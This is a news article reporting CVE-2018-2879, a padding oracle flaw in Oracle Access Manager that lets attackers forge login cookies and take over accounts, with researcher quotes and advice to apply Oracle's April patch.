Oh no, you're thinking, yet another cookie pop-up. Well, sorry, it's the law. We measure how many people read us, and ensure you see relevant ads, by storing cookies on your device. If you're cool with that, hit “Accept all Cookies”. For more info and to customize your settings, hit “Customize Settings”.

Review and manage your consent

Here's an overview of our use of cookies, similar technologies and how to manage them. You can also change your choices at any time, by hitting the “Your Consent Options” link on the site's footer.

Manage Cookie Preferences
  • These cookies are strictly necessary so that you can navigate the site as normal and use all features. Without these cookies we cannot provide you with the service that you expect.

  • These cookies are used to make advertising messages more relevant to you. They perform functions like preventing the same ad from continuously reappearing, ensuring that ads are properly displayed for advertisers, and in some cases selecting advertisements that are based on your interests.

  • These cookies collect information in aggregate form to help us understand how our websites are being used. They allow us to count visits and traffic sources so that we can measure and improve the performance of our sites. If people say no to these cookies, we do not know how many people have visited and we cannot monitor performance.

See also our Cookie policy and Privacy policy.

This article is more than 1 year old

Oracle Access Manager is a terrible doorman: Get patching this bug

Security tool can be gamed to let any old riffraff into data

A security vulnerability in Oracle Access Manager leaves the network authentication tool leaning more toward "access" than "manager."

The flaw, classified as CVE-2018-2879, can be exploited by a remote attacker to bypass an Oracle Access Manager (OAM) authentication screen and, in the process, take over the account of any user or administrator on a vulnerable system.

Designed to manage remote connections to cloud and mobile apps via a single sign-on page, with multi-factor authentication, OAM is offered by Oracle as a part of the security and administration tools for its middleware and PaaS platforms.

Youtube Video

According to researcher Wolfgang Ettlinger of SEC Consult Vulnerability Lab, a miscreant can exploit a flaw in the way OAM handles encrypted messages to trick the software into accidentally disclosing information that can be used to log in as someone else. Specifically, a padding oracle attack can, ultimately, disclose an account's authorization cookie.

An attacker properly gaming the OAM flaw would then be able to create and execute a script that generates valid login keys for any desired user, including administration accounts. From there, the attacker is able to simply write their own login credentials and take complete control over OAM.

"An attacker can abuse this vulnerability to log in to any resource protected by the OAM using any user account, even administrative accounts," Ettlinger explains.

"This security vulnerability completely breaks the main functionality of the OAM product."

Fortunately, there is already a solution in place. Ettlinger said his company contacted Oracle about the flaw and the enterprise software giant was able to slip a fix for the vulnerability into its April security updates.

As Oracle's patch is the only known way to address the flaw, it is recommended that administrators make sure they have that update applied. Versions 11.1.2.3.0 and 12.2.1.3.0 and earlier are still vulnerable. Even then, Ettlinger notes, that this flaw was even present is not a very good sign.

"Since the vulnerability was found in such a central component of the OAM, we suspect that an insufficient amount of attention has been given to information security," Ettlinger notes.

"Given the central position in an organization's security infrastructure, we recommend Oracle's customers either conduct a full audit of the component or request the results of such audits from Oracle." ®

 

Similar topics

TIP US OFF

Send us news


Other stories you might like